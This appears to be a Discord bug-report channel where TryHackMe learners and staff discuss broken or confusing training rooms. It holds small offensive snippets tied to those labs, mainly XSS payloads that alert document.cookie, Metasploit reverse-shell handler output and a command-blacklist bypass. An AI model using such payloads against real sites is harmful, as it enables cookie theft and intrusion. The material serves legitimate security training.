hey Linux: Local Enumeration have bug?I can't nc on machine

I still want to know how the hell you were meant to know it was there without scripting it against a wordlist and just grepping for the key

You guess apparently

Which room?

teamcw @glad badger

Without giving anything away: fuzzing 😄

Exactly

I literally just did a curl with a bunch of standard config locations, then grepped each output in a bash script

But the location was incredibly random

Yeah, maybe trying to simulate administrator mistake, sticking a key in a file that is not designed to have it. 😄

any way to bypass into the room? it just stays loading

Using the jr link seems to fix it for some weird reason

https://tryhackme.com/jr/introtoshells

it defaults to /room/introtoshells when I put it into the browser or try re-adjusting it and then keeps in an infinite loop

@real bramble do you have some kind of script blocker running? Or are you using brave? You'll likely have to disable anything like that to ensure it all works properly.

This is still an issue.

@hazy hinge

I was not, I opened it on the virtual machine and this was the only room causing issues

What are you on about?
And please don't randomly ping staff.

I was alerting that the issue I replied to is still a problem. And then I @ the room owner.

Oh, there was a reply -- apologies I completely missed that.

For the record, Heavenraiza is very rarely in the Discord. He's a full-time content creator which means his rooms are technically site-owned

So, give CMNatic a ping for them :)

(Not that you or anyone else is expected to know that off the bat -- just so you're aware just now 😄 )

@obsidian kiln No problems. 😬 I wasn't aware he was staff until you told me. Do you want me to repost the issue pinging CMNatic or will you look into it?

@dusky junco mind looking into this when you get a chance, mate? :)

Done 😁

@obsidian kiln Has the announcement date for HOTH Winner extended

That... is a good question.

CMN is also the one to answer that

Sorry but the expected answer is correct. I double checked.

Not an issue.

Or that. Ta 😄

i just checked in again and it is the number asked ... am somewhat confused now.. was sure it was something different back then... maybe i was really tired or blind sorry for bugging you about it in that case

I was certain it was a number short as well, until I rechecked just now. My bad.

hello, here to report a "bug" https://tryhackme.com/room/postexploit.
most of the commands in the first task are now deprecated and for a newby as i am, it is difficoult to find working alternatives. it would be awesome to update the room 🙂 thank you!

PowerSploit is no longer supported that doesnt mean the commands are deprecated its still fine

Is the Splunk room up and running? I am unable to join it either through the Cyber pathway or through the room directly.
I am able to join other rooms.

The Splunk room works well for me.
Any error messages or screenshot?

Just sends me to "My Rooms" with an unknown error - Please try again later. Guess I'll try again later...

maybe #site-support is better

@twin tapir i mean, i try these commands and they don't work. i may be missing something but i am not able to work through the machine

also, running powerview.ps1 seems to do nothing. I tried to restart the machine but it still doesntt work

i did both the Active directory basics and attacktive directory rooms, same command there works, here it doesn't

for example Get-NetUser gives the "not recognized as cmdlet" error

You're running it. You need to load it. This explains the next issue you're having. Closed, not a bug.

you mean with powershell ise?

it actually works that way

thanks

No. I mean with . .\script.ps1. dot space dot backslash.

i tried that but it doesnt work

with powershell ise it works, i will continue that way

That's what #room-help is for. It worked when I did it, about 2 weeks back.

understood, i simply thought it was a bug as it didnt work as described by the room

The room Corp refers to downloading files directly from github to the room box. Should probably tell that it can only happen via the testers local machine.

Also in Corp room, the administrator password has expired.

(not a big deal but you have to change it when trying to login)

the corp one is well known

On Lian_yu room : https://tryhackme.com/room/lianyu
There is no video on the address : http://[ip]/[I AM NOT]/[SPOILING]/
The youtube video on link : https://www.youtube.com/embed/X8ZiFuW41yY is down

On the Django room : https://tryhackme.com/room/django
It's asked to migrate before that the urls.py is created so it says {name_of_the_app} is unknown

You don't need the video

And in the shodan room : https://tryhackme.com/room/shodan
some of the answers are outdated

There's a big note on the room for that.

Sry I don't see it

where did u found it ? On the room page ?

yeah, first task

I just have that

strange🤔

Then why not fix it?

it's likely very low down on THM staff's to-do list

The creator has also left IIRC?

can confirm, he's not in here anymore

he works for HTB now iirc

It's something minor that you can work out reasonably easily.

Yeah i know i did it, but hey how can you know when you are doing the room, it's easy to fix though

It would just make sense as it is part of one of the official training paths (offensive pentesting)

In learncyberin25days Task 22 cant be started, because the started machine does not have port 22 open. So no connection possible.

Give it a while to boot

Ok, will try again. Thanks

Hi, I have a question regarding RSA
In the room: https://tryhackme.com/room/encryptioncrypto101
Task 6:

The public key is n and d, the private key is n and e.

There’s a lot more maths to RSA, and it gets quite complicated fairly quickly. If you want to learn the maths behind it, I recommend reading MuirlandOracle’s blog post here.
https://muirlandoracle.co.uk/2020/01/29/rsa-encryption/

here it says that the public key is n (the product of p and q) and the d (decryption key) which seems counter intuitive, decrypting stuff should be private, right?

In MuirlandOracle’s blog post it says the opposite of the room:
Public key: e and n (anyone can encrypt messages for me using the public key)
Private key: d and n (only me can decrypt the messages using my private key)

Has this mistake really been sitting there all that time?

That's a super tiny mistake, and has been fixed.

Hello. I have a question about Linux Fundamentals Part 1 (https://tryhackme.com/room/linux1). Shouldn't be provided name and pass for ssh in the description of the task as well? I had to open the video in order to see what credentials I should use. I am missing something or they are, indeed, missing?

You don't need to SSH as it has in-browser access

https://tryhackme.com/room/dnsmanipulation, task 6
some of the python files are links by themselves

i let them know. thanks 🙂

i really think the ( WiFi hacking 101 room ) need to be adjusted , they just asking questions and not explaining any this , i could not answer these question without searching the internet and they did not provide any explanation for the airmon-ng tool , for a beginner this room is not that much useful

You are meant to search the internet

Rooms are not standalone. They are to be supplemented with your own research

You are perfectly able to read manuals, the room is a guided approach through some of the theory (not the tools) and then using the tools to attack your own hotspot.

the room is completely depending on my search , and i was asked to download a file and use it to crack a password without any explanation of how i can use this file

`I will attach a capture for you to practice cracking on. If you are spending more than 3 mins cracking, something is likely wrong. (A single core VM on my laptop took around 1min).

In order to crack the password, we can either use aircrack itself or create a hashcat file in order to use GPU acceleration. There are two different versions of hashcat output file, most likely you want 3.6+ as that will work with recent versions of hashcat.`

The capture comes from the steps in the task above

Did you follow the steps with your own hotspot and wifi card?

they asked me to uses these files without even knowing what is hashcat files or how to use it on aircrack tool , compared with other networking rooms this room needs to be adjusted to be suitable for beginners , if you will ask me to 100% search the internet the you just give me the tool name and tell us to search for it

I made that room

But it really really sounds like you need to research as you're working

90% of hacking is research.

Beginners need to learn this too.

There are other beginner rooms that require hash cracking.

Easy marked room doesn't mean you can do it without any experience

Please don't post accepted answers

Did you work through the room with your own access point and wifi card? @somber wave

yes and i finished the room but still did not gain much knowledge because its hard to search for every single information in the room you just told me that their is a tool called airmon-ng that is used to hack wifi and i searched every thing else , i still don't know what is the hashcat tool/file or how to create it , i have to search it too and then search how to use it in airmong

Ok. I'm choosing to not change the room, because I feel research is a very valuable skill. If you read the manuals for the tools as part of answering the questions, you will understand better.

This room was not paid for by tryhackme, it is not subscriber only, and your opinion has been noted.

don't take it personal man , i am just saying my opinion and you can take it or ignore it , i finished the room and i will keep searching for what i need to learn it was for the sake of you room benefit

not a bug, that's a private address. it's not asking you to resolve the address, look up "PTR" records which are the records used for reverse dns lookups

it's okay :)

Ima beginner

There's an RFC which details how that works

anybody has trouble using the pip3 command on DNS Manipulation?

try pip only

It's not installed on the box, and it's not allowing me to install it either.

This is what I'm getting:

The box does not have an internet connection

THM rooms do not, generally.

never mind, figured it out

You shouldn't need to install anything on the target vm

On the xss room on Task 5, if you use a valid image and go ||http://10.10.191.15/img/smallLogo.png" onmouseover="alert(document.cookie);||, then you will not get the flag - But if you use an invalid image and go ||nothinghere" onmouseover="alert(document.cookie);|| you will get the flag. You should get the flag either way.

it's looking for a specific exploit I think

detecting xss is tricky as there are multiple ways to get the same result

The exploit is valid (Shows the flag) with any invalid image, but never with a valid image - But nowhere does it specify that the image has to be invalid

And task 8 effectively requires a walkthrough since most variants to display the required alert don't produce the flag :p

The first image from Task 9 is also broken - https://d21ic6tdqjqnyw.cloudfront.net/wp-content/uploads/2013/01/08111203/BlogHeader.png

Hey all!
In the new and great https://tryhackme.com/room/dnsmanipulation
Task 4 / 1 should specify that it's looking for a basic nslookup command in a specific format, using the -type argument
(It does not accept either ||nslookup -q=txt youtube.com'|| or ||Resolve-DnsName -Name youtube.com -Type TXT`|| )

Kudos to imO for making this really informative room.

it should but it can't. It's a known issue due in part because detecting XSS is not easy

to be fair it's in the -help, and nslookup is the first thing that comes up when using google

there's also the answer hints that give the expected length

Valid point, just leaving feedback as I personally use the -q argument, and had to google this. 🙂
Probably different search results, but for me the first for nslookup txt google query is https://blog.rmilne.ca/2015/09/11/how-to-use-nslookup-to-check-dns-txt-record/ which uses the -q format.

fair enough

I didn't know about -q but it makes sense

Was trying to find the /help in nslookup, but it's really shitty. 🙂

yeah it's a bit awkward

~
❯ nslookup
Default Server:  one.one.one.one
Address:  1.1.1.1

> help
Commands:   (identifiers are shown in uppercase, [] means optional)
NAME            - print info about the host/domain NAME using default server
NAME1 NAME2     - as above, but use NAME2 as server
help or ?       - print info on common commands
set OPTION      - set an option
    all                 - print options, current server and host
    [no]debug           - print debugging information
    [no]d2              - print exhaustive debugging information
    [no]defname         - append domain name to each query
    [no]recurse         - ask for recursive answer to query
    [no]search          - use domain search list
    [no]vc              - always use a virtual circuit
    domain=NAME         - set default domain name to NAME
    srchlist=N1[/N2/.../N6] - set domain to N1 and search list to N1,N2, etc.
    root=NAME           - set root server to NAME
    retry=X             - set number of retries to X
    timeout=X           - set initial time-out interval to X seconds
    type=X              - set query type (ex. A,AAAA,A+AAAA,ANY,CNAME,MX,NS,PTR,SOA,SRV)
    querytype=X         - same as type
    class=X             - set query class (ex. IN (Internet), ANY)
    [no]msxfr           - use MS fast zone transfer
    ixfrver=X           - current version to use in IXFR transfer request
server NAME     - set default server to NAME, using current default server
lserver NAME    - set default server to NAME, using initial server
root            - set current default server to the root
ls [opt] DOMAIN [> FILE] - list addresses in DOMAIN (optional: output to FILE)
    -a          -  list canonical names and aliases
    -d          -  list all records
    -t TYPE     -  list records of the given RFC record type (ex. A,CNAME,MX,NS,PTR etc.)
view FILE           - sort an 'ls' output file and view it with pg
exit            - exit the program

had to do it in two times

thanks 😄

Again, I learned something.

it's wierd

Let's not talk about this either:
https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/nslookup
🙂

MS docs is...really complete and totally useless

not sure how they managed that

well, it's an old-school tool

Thanks @gleaming shadow !

np

it's too bad that the platform doesn't allow multiple answer questions but c'est la vie

In ghidra room it suggests to install sudo apt install openjdk-13-jre openjdk-13-jdk

but the packages has been removed from kali linux distribution

should probably use default-jre and default-jdk

just jdk should be sufficient

or jre if you're just planning on running, though didn't they combine those recently?

but the jdk generally contains a jre as well

the problem is openjdk has been removed from the repo

some one had the problem before where they tried to install openjdk in kali

http://pkg.kali.org/pkg/openjdk-13

it was removed on 25 jan 2021

11 seems to be LTS, though 14 should be as well

default-jdk seems to point to 11

i think it depends on distros

https://pkg.kali.org/pkg/openjdk-17

seems like they did not went for 14 and removed 13

kiba machine broken ?

Nah

is the broker machine broken or is it WSL2's networking stack that's being dumb? I tried 3 different clients and nothing's establishing a proper connection

I'm getting packets though

Not broken as far as I can tell, I speedran it before release today. 🙂

alright, must be missing something then

it's....I dunno, I had issues, eventually wrote a custom client

Site bug. #site-bugs

It's a site bug. Not a bug with a room. I do not represent tryhackme. Please report thr bug in #site-bugs.

Ok, thanks

Hey guys not sure if this is exaclty a bug, but when doing the active directory basics course, in the hands on lab section, when using the start machine option it just forces the inbrowser machine to launch, the room mentions you should be able to RDP or SSH but the machine wont start without the in browser machine. (Sorry if this is the wrong spot for this)

The in browser machine is the deploy here, right? Not the attack box?

Because if so, that's not a bug.

You need to deploy the machine in order to interact with it.

Thats exactly what happend. Sorry the text was a little confusing wasnt sure/

Hello, I've seen multiple people encounter this issue here
On the room Introductory Researching (https://tryhackme.com/room/introtoresearch), Task 3
Searching for the "FuelCMS" exploits in ExploitDB or with the searchsploit tool will return 0 result. This is because for some reasons, it got renamed "Fuel CMS" with a space. It might be better to make this modification in the room too

Also, in the room Google Dorking (https://tryhackme.com/room/googledorking) Task 2, the first diagram shows an arrow from Crawler to internet, and the other diagram below shows the arrow from internet to Crawler. Either I missed something, or this is a mistake

https://tryhackme.com/room/zthobscurewebvulns - Task 18 - Accidentally using a malformed JWT (An = before the first .) crashes the web server requiring you to Terminate and re-launch the machine.

HELLO People I'm in hackpark room I generated msfvenom shell and upload it
when I run it over the target windows server it shows the meterpreter started but no shell received, as appear here
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.8.124.XXX:44XX

please don't spam all the channels, it's probably user error and not a bug

hello i am on the /networkservices room on task 9 the first question.
i did a nmap -p- scan twice but could only find 1 host who was up. But 1 host is the wrong answer.
am i doing something wrong or is it the question?

it takes forever for the second service to boot

ahhhh ok

It's a bug with the room, in a way. It's known about

also on task 6 the 6th question, the dots where dot lining up with the answer. maybe just a bug on my side

the 6th question is like freetext?

No answers with . in them on T6

"Based on the title returned to us, what do we think this port could be used for?"

that question i ment

https://tryhackme.com/room/windows10privesc - Task 9 - The winlogon registry key doesn't actually contain the password (There is a DefaultUserName entry, but the DefaultPassword entry where you would find the password is missing)

Up

on the Pickle Rick room, ||portal.php blocks commands like cat, head, more, etc., but doesn't block the command less. Is it intentional that we can use less? I was able to use it to let me print out the first two ingredients without any additional access||
Edit: ||Oh I guess I could have done the whole thing without any additional access if I'd just run sudo -l earlier lol||

yea you're meant to bypass the black list by finding commands that can provide an output

so that is intended

ok, neat

Hey guys, the Blaster room's windows machines browser history has been deleted which i needed for a task. Can any1 help, please.

#room-hints

Hey guys, im starting today at tryhackme and Im stuck in the intro to networking room

In task 8, the question "Which city is the registrant based in?"

I belive the correct awnser would be Menlo Park but it doesnt seem to work

Oh nevermind

Not a bug, you have missed where it changes domain

Thx

https://tryhackme.com/room/magician is there somethign wrong with this room?

i can't access to it

the hosts file is not working

how can i actually access to it?

https://tryhackme.com/room/intro2windows - The information from Task 1 is missing Windows 2000 / Windows ME

Task 3 - "Authentication method that assings" - assigns, not assings

Room WebAppSec 101 /admin/ page has some PHP bug

Hello. This is from the room Network Services 2 (https://tryhackme.com/room/networkservices2), Task 3. I think this alignment is not intended.

Wow that looks totally different to when I reviewed it

I have refreshed it a couple of times before going for the screenshot to be sure it is nothing from my side 🤭

I'll see who's online who has edit access

CMN's on the case

Thanks @undone drift I fixed a few typos and things at the same time cc @eternal summit (:

No idea why the task editor done what it did...but hey...that thing has it's own mind

good luck finding another C 😄

appreciate it though

😦 😦 😦 yeah, I just noticed

There we go 😄

added a 👻

good enough 😏

😄

awesome. Now I'm done. Cheers

Sweet!

https://tryhackme.com/room/alfred getsystem in meterpreter works, kinda defeating the point of using incognito.

Task 2 could also really do with being clarified. The commands aren't meant to be done via a build in Jenkins, they're meant to be done using the reverse shell you got in Task 1.

I have a strong feeling Alfred is on my list to re-visit once I've got a few other things out the way

nonetheless I'll make sure it is thanks (:

Hey, link to PentestMonkey gives 500: Internal Server Error
What the Shell? > WebShells

What task is this for please @warm maple ?

Privilege Escalation and Shells of complete beginner path

that link works for me, the one you underlined

hmm.. sorry ESET killed the page

I just updated it (:

https://tryhackme.com/room/rpmetasploit Task 5 tells you to set a meterpreter payload for multi/handler and set LHOST there. That's totally pointless, and you need to set LHOST again when you switch back to Icecast. In addition, you now get a meterpreter shell to using shell_to_meterpreter in task 6 does not work.

Switching module to multi/handler here causes a LOT of issues, and I think it should be removed.

isn't tha a bug on the variable declaration ? (It's the Rust room task 4)

the answer for the question in new room badbyte for this is wrong

the cve you have to give has no mention of what the question asks

you need to provide cve number

CVE-XXXX-XXXX

https://tryhackme.com/room/introtonetworking Task 7 traceroute is not installed on thm attackbox

@dusky junco ^ ❤️

i did

and the CVE number it accepts has no mention of LFI if you look it up

dm me ans

🙂

Hi, I noticed an incorrect answer in tryhackme.com/room/rpnessusredux
For the first Q in task 3 has the answer listed as 'new scan' but the question is asking about launching a scan

not sure if it's a bug but the room badbyte has basically nothing on it (?)

Seems fine to me?

i mean the machine

Intentional.

mh aight

what do I have to do if the room has a bug prevents me to complete the root step? I tried multiple time to reapply the same method with no luck to receive the root shell by meterpreter

anonymous ftp login on Ghizer is not working

yeah it is bug cmnatic told me he will look into it

btw i was talking about the points

they did not get reset

for testers

https://tryhackme.com/room/blaster
On the room blaster there is an question (Task 3 Question 1) which requires to look at the browser history but when I check the history its empty

Is this an bug ? Without the history its not possible to find the CVE that is required to complete the task

It's a known bug

You can also google the CVE online

Lol. Alright

i'm doing "relevant" room. facing some issue with smb connection. Like, it's very slow and get commando times out.
smb: > get passwords.txt
NT_STATUS_IO_TIMEOUT opening remote file \passwords.txt
smb: > SMBecho failed (NT_STATUS_CONNECTION_RESET). The connection is disconnected now

anyone else?

ok, should be something I tried with metasploit, just terminating machine and launching it again, fixed the problem

Room: ccradare2 there are extra code blocks

in task 3 4 5

In the room "Linux: Local Enumeration", the machine has an extra curly brace that might be confusing for beginners.

Room: John The Ripper (https://tryhackme.com/room/johntheripper0)
Task 4 (Cracking Basic Hashes)

This sentence ends weird -> "Download the attached .txt files that" 😏

Room: MAL: Malware Introductory
When i connect in RDP and try to get the hash of a file there is empty. Could you help me?

Can Anybody Confirm Me whether EnterPrize Room Is Workn? Bcuz I'm not getting foothold on User in the Room with any payload

what you are trying over there seems to be that you try to get the hash of a shortcut..?

Got a concerning issue with one of the rooms: Linux: Local Enumeration, Task 7, question2. I enter the correct payload and get an incorrect response plus an error code: "Uh-oh! Undefined." My antivirus then pops up stating that it blocked a payload from acting. Has anyone else gotten this error?

Your AV thinks that it's malware calling back to an attacker (which it obviously isn't given you entered the command yourself). Whitelist the TryHackMe domain. We're in the process of telling the AV providers to cut it out

Ah okay, will do! Thanks!

Np 🙂

@glossy ivy I did the room recently and it worked for me have you tried using the browser machine?

yes, i am trying to see the hash of a .exe

Hmmm, i will try this.

Hi I think I found a bug with room https://tryhackme.com/room/linux3 when I first loaded the page there were two join room buttons on the first task, I clicked both of them and it just marked all tasks for the whole room as complete.

complete beginner path has a new room in it that displays as 'undefined'

@twin tapir Your command to add the machine to System32/drivers/etc/hosts doesn't work properly in https://tryhackme.com/room/attackingkerberos

Adding it via notepad looks more functional, doesn't work with nslookup

Task 6, missing a fullstop and an apostraphe were simply reusing an existing ticket from another user on the domain and impersonating that ticket.

L O O K S a b o u t r i g h t ? D o n ' t y o u t h i n k ?

RIP

pretty sure that used to work

oh well Ill eventually fix it

you missed an apostrophe

I've just done this room, this bug happens when using powershell, when using cmd it works properly

If you're still stuck, you have to go through the "Settings" menu (on the same tab you've screened) and choose the hash function of your choice, then it will be calculated

The room 'Blue' keeps failing whenever I try to run the exploit, terminated it multiple times and still same issue, what should I do?

Go into #room-help, show options, and post a screenshot. Because the likelihood is that your LHOST is wrong

@eternal summit, That's true! I've changed it and It works now!

Thanks :)

Thanks for that. I was just stumped with why that was happening👍🏽

@twin tapir I suggest you point to another link for the installation of openVAS on Kali. The present one is for setup on ubuntu and doesn't work! A long waste of time!! This one works better for Kali https://www.agix.com.au/installing-openvas-on-kali-in-2020/

For God's sake, Cry. Just help 'em install in Docker. So much easier.

Openvas Task7 question one , won't take the right answer . Possible type-O

@twin tapir

worked for me last night o.O

what did you try entering?

The start time of the scan with the extra , in it . However it did not submit as valid flag, however question two takes the end date as valid @gleaming shadow

the one in the table?

ending in 46?

:36

there are 2 "started" fields

wat

😄

I see

my bad I tought the first one was what i am after

the second has the comma...

should I remove my previous messages

?

True

naw maybe it'll help others

Noice thank you

😄

need to be careful with Docker on WSL as it takes the windows network connection, and not the WSL one, so the vpn needs to be active on the windows host.

Why would you use Docker on WSL...

wsl2

because it's faster than the full Hyper-V backend?

and can integrate with WSL2 VMs without having to reinstall docker everywhere

Honestly, you're shooting yourself in the foot if you're not able to use Docker on your attackbox

Windows VM in https://tryhackme.com/room/introtoshells that should be serving a web page takes forever to load and most of the time leads to timeout. I also cant connect to it the VM via FreeRDP

@dusky junco could you check the specs/licensing on that box for me please?

I'll take a look at this today (: @somber vessel @obsidian kiln

Thank you!

I've got a few things to do/sort out beforehand but yeah I'll let you know

No need for that. I installed it according to the link I gave above. Works perfect now. It's an interesting room, bit outdated info though. Its called now GVM and works a bit different than the older versions openvas 8 and 9.

For the record I'm v hesitant on installing things from the get go on the attackbox (as useful as they may be) because of numerous reasons like:

• increases the boot time when you deploy
• from a business point of view -- we have to increase resources which very quickly gets even more expensive considering the amount of users we have use the attackbox daily (cc @twin tapir)

I'll look into how much impact having openvas has on the attackbox has etc but yeah

The above is my general logic behind choosing what to add to the attackbox etc

I am able to use it, that`s the point...

Docker on Windows uses the WSL2 as a backend, and it integrates with other WSL2 distros

but it uses the host network connection

which is the gotcha

I'm using it on my own VM via vpn. Interesting kit. Have to look into what more it has to offer,

Point being: why are we attacking from the host and not a VM?

I use WSL2 because VMs don't play nice with hyper-V, Docker requires hyper-V and kali in hyper-V is a PITA

WSL2 is a lightweight VM to begin with

just that docker integrated some magic to make it play nice

may I dm you @gleaming shadow

?

Regardless, the ideal way to install it would be in a VM using docker imo. Anything beyond that is a personal thing.

docker pull, yes

it's just that docker in Windows behaves a bit oddly

at least with WSL2

Yes, but, uh, docker in windows isn't exactly the recommended way of connecting up